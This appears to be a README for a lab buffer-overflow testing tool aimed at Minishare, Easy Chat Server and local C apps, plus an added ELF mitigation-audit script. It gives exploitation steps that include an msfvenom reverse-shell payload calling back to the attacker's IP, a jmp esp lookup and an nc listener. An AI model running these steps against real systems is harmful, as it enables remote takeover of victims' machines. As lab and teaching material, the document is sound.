This project tests applications for buffer-overflow vulnerabilities. It has been tested with two local C apps, the Minishare remote application, and the Easy share application.
INSTALLATIONS AND TOOLS
- Windows 10/11 (Victim Machine)
- Kali Linux over VirtualBox (Attack Machine)
- Immunity Debugger (on Victim Machine)
- Python 3.8
- Pwntools
- GNU Debugger
- Minishare 3.4
- Easy Chat Server 1.4.1
CONFIGURATION AND SETTING UP (IMMUNITY DEBUGGER)
- Open Immunity Debugger as administrator on Windows
- Open Minishare 1.4.1 as administrator on Windows
- Attach Minishare to Immunity Debugger
- View Executable Modules, find SHELL32.dll and double-click it
- Find the address of the ‘jmp esp’ instruction and take note of it
- Open Kali Linux
- Find your Kali IP address
- Run (msfvenom -p windows/shell_reverse_tcp LHOST=#ipaddress LPORT=4444 x86/shikata_ga_nai -b “\x00\x0a\x0d” -f py) on your Kali machine to generate a reverse shell for your IP and port
- Open BufAutoDetect.py
- Enter the output of the above command as the new value of the ‘buf’ variable
- Enter the address obtained from ‘jmp esp’, in reverse byte order, into the shellcode
- Run BufAutoDetect.py and open a new terminal to listen on port 4444
RUNNING AND TESTING LOCAL APPS
- Start Kali Linux in VirtualBox.
- Open a new Kali Linux terminal and navigate to the base folder for AutoBuf.
- Compile the C apps with: gcc app.c -o app -fno-stack-protector -no-pie (and likewise gcc app1.c -o app1 -fno-stack-protector -no-pie)
- Run the command: python3 BufAutoDetect.py local -p n, then provide the directory of the C apps
- Payloads include n, an, l
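
The compile step above switches off the stack protector and PIE so that the local test apps are overflowable. The following check reports whether an ELF binary carries those two mitigations, which is useful for confirming a lab build or auditing a release build. It is an added example, not part of AutoBuf; the names audit_elf, findings and sample_elf are hypothetical and the sample header is constructed.

```python
import struct

ET_EXEC, ET_DYN = 2, 3  # ELF e_type: fixed-address executable vs. PIE (or shared object)

def audit_elf(data: bytes) -> dict:
    """Report whether an ELF image was built with PIE and a stack protector."""
    if len(data) < 18 or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    # e_ident[EI_DATA] at offset 5: 1 = little-endian, 2 = big-endian
    if data[5] not in (1, 2):
        raise ValueError("invalid EI_DATA byte")
    endian = "<" if data[5] == 1 else ">"
    # e_type is the 16-bit field that follows the 16-byte e_ident array
    (e_type,) = struct.unpack_from(endian + "H", data, 16)
    return {
        "pie": e_type == ET_DYN,
        # GCC's canary check references this symbol; a byte search is a heuristic
        "stack_protector": b"__stack_chk_fail" in data,
    }

def findings(data: bytes) -> list:
    """Return one line per missing mitigation (empty list if both are present)."""
    report = audit_elf(data)
    out = []
    if not report["pie"]:
        out.append("no PIE: code loads at a fixed address (-no-pie)")
    if not report["stack_protector"]:
        out.append("no stack canary (-fno-stack-protector)")
    return out

def sample_elf(e_type: int, extra: bytes = b"") -> bytes:
    """Constructed sample: bare 64-byte little-endian ELF64 header plus extra bytes."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8)          # 16-byte e_ident
    rest = struct.pack("<HHI", e_type, 0x3E, 1) + bytes(40)      # e_type, e_machine, e_version
    return ident + rest + extra

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                      # audit a real file, e.g. ./app
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:                                      # fall back to the constructed sample
        image = sample_elf(ET_EXEC)
    for line in findings(image) or ["PIE and stack protector present"]:
        print(line)
```

The symbol search is only a heuristic: a statically linked binary contains __stack_chk_fail from libc even when its own functions were compiled without canaries.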
RUNNING AND TESTING MINISHARE REMOTE APPS
- Start Kali Linux on the attack machine and Minishare on the victim machine.
- Open a new Kali Linux terminal and navigate to the base folder for AutoBuf.
- Run the command: python3 BufAutoDetect.py remote1 -ip #ipaddressofwindows -s #portofMinishare
- Then open a new terminal and listen for the output of the script using: nc -l -p 4444
RUNNING AND TESTING EASYCHAT SERVER REMOTE APPS
- Start Kali Linux on the attack machine and Easy Chat Server on the victim machine.
- Open a new Kali Linux terminal and navigate to the base folder for AutoBuf.
- Run the command: python3 BufAutoDetect.py remote2 -ip #ipaddressofwindows -s #portofEasychatserver
- Calc.exe runs when Easy Chat Server is overflowed
A video demonstration and pictures can be found in the 'processes' folder.